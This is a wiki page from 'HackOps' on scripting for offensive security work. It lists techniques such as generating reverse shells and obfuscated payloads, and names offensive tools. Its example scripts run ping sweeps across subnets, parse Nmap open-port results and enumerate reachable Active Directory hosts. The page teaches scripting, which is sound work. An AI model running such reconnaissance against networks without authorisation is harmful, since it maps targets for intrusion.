Scripting Basics

From HackOps
Jump to navigation Jump to search

Scripting Basics

Scripting automates repetitive tasks, accelerates testing, and glues tools together. A single script can gather data, transform output, launch exploits, and log results in seconds. The three core environments are Bash, Python, and PowerShell; each dominates a different operating system family yet follows the same logic: read input → process → act.

Common Techniques

  • Parsing tool output and extracting key fields with regular expressions or JSON‐filters
  • Looping through wordlists, IP ranges, or file paths to launch bulk scans
  • Wrapping exploits in functions for re-use across targets
  • Chaining commands with pipes to form one-liner workflows
  • Reading STDIN / STDOUT for live data transformation
  • Generating payloads dynamically (reverse shells, encoded scripts, shellcode)
  • Logging actions and timestamps to CSV or SQLite for later reporting
  • Using environment variables and arguments to create portable modules
  • Invoking REST APIs to pull scope lists, asset inventories, or vulnerability feeds
  • Scheduling scripts via cron, Task Scheduler, or at jobs for continuous monitoring

Tools

  • Bash (POSIX shell with extensive native command set)
  • Python (multiplatform language with libraries such as subprocess, requests, and pwntools)
  • PowerShell (object-centric shell for Windows and cross-platform automation)
  • jq (lightweight JSON processor ideal for API or tool output)
  • awk & sed (stream editors for quick text manipulation)
  • Expect (automates interactive CLI sessions)
  • Impacket scripts (Python collection for network exploitation)
  • pwntools (CTF-oriented Python framework for exploit development)
  • psutil (Python library for process and system information)
  • Invoke-Obfuscation (PowerShell module for payload transformation)
  • Cron / Task Scheduler (native schedulers for timed script execution)
  • tmux / screen (terminal multiplexers that keep long-running scripts alive)

Quick Examples

Bash

This script scans a given subnet for live hosts by sending ICMP echo requests (ping) and prints responding IP addresses. 

#!/bin/bash

# Loop through IP addresses 1 to 254 in a subnet
for ip in $(seq 1 254); do

    # Send 1 ping (-c 1) to each IP in the given subnet (passed as $1)
    # Example: if $1 = 192.168.1, it pings 192.168.1.1 to 192.168.1.254
    ping -c 1 $1.$ip |

    # Look for lines in the ping output that contain "64 bytes"
    grep "64 bytes" |

    # Extract the 4th field (which contains the IP with a colon at the end)
    cut -d " " -f 4 |

    # Remove the trailing colon from the IP
    tr -d ":" &

done

# Notes:
# - $(...) is used instead of backticks \`...\` (modern syntax)
# - '&' runs each ping in the background for speed
# - This script prints a list of live hosts in the subnet
# - Usage: ./script.sh 192.168.1

This script performs a fast parallel ping sweep across a /24 subnet and logs all responsive IPs to a CSV file. 

# Scan a subnet (10.10.10.1–254) and log live hosts to a CSV file

# Loop over all IPs in the subnet
for ip in 10.10.10.{1..254}; do

  # Ping each IP once (-c1), wait max 1 second for reply (-W1)
  # Suppress output (&>/dev/null), and if host responds, log to file
  ping -c1 -W1 $ip &>/dev/null && echo "$ip,up" >> live.csv &

done

# Wait for all background pings to finish
wait

Python

This script extracts and displays open ports for each host from a parsed Nmap XML scan report. 

# Parse Nmap XML output and print open ports per host

import xml.etree.ElementTree as ET  # XML parser from standard library
import sys  # (commonly used for CLI arguments, not used here)

# Load and parse the Nmap scan file
tree = ET.parse('scan.xml')

# Loop through each host in the scan
for host in tree.findall('.//host'):

    # Extract the IP address of the host
    addr = host.find('address').attrib['addr']

    # Collect all open port numbers for this host
    ports = [
        p.attrib['portid']
        for p in host.findall('.//port[state/@state="open"]')
    ]

    # Print IP address and a comma-separated list of open ports
    print(addr, ','.join(ports))

PowerShell

This script queries all computer objects in Active Directory and checks which ones respond to ping. 

# Get all Active Directory computer names and test if they are reachable

# Query all computer objects in Active Directory
Get-ADComputer -Filter * |

    # Extract only the 'Name' field (hostnames)
    Select-Object -Expand Name |

    # For each hostname, test network connectivity
    ForEach-Object {
        if (Test-Connection -Quiet $_) {
            # If reachable, print confirmation message
            "$_ reachable"
        }
    }

# Notes:
# Test-Connection is equivalent to 'ping'
# -Quiet returns only $true or $false (no output text)
Retrieved from "https://hackops.wiki/index.php?title=Scripting_Basics&oldid=93"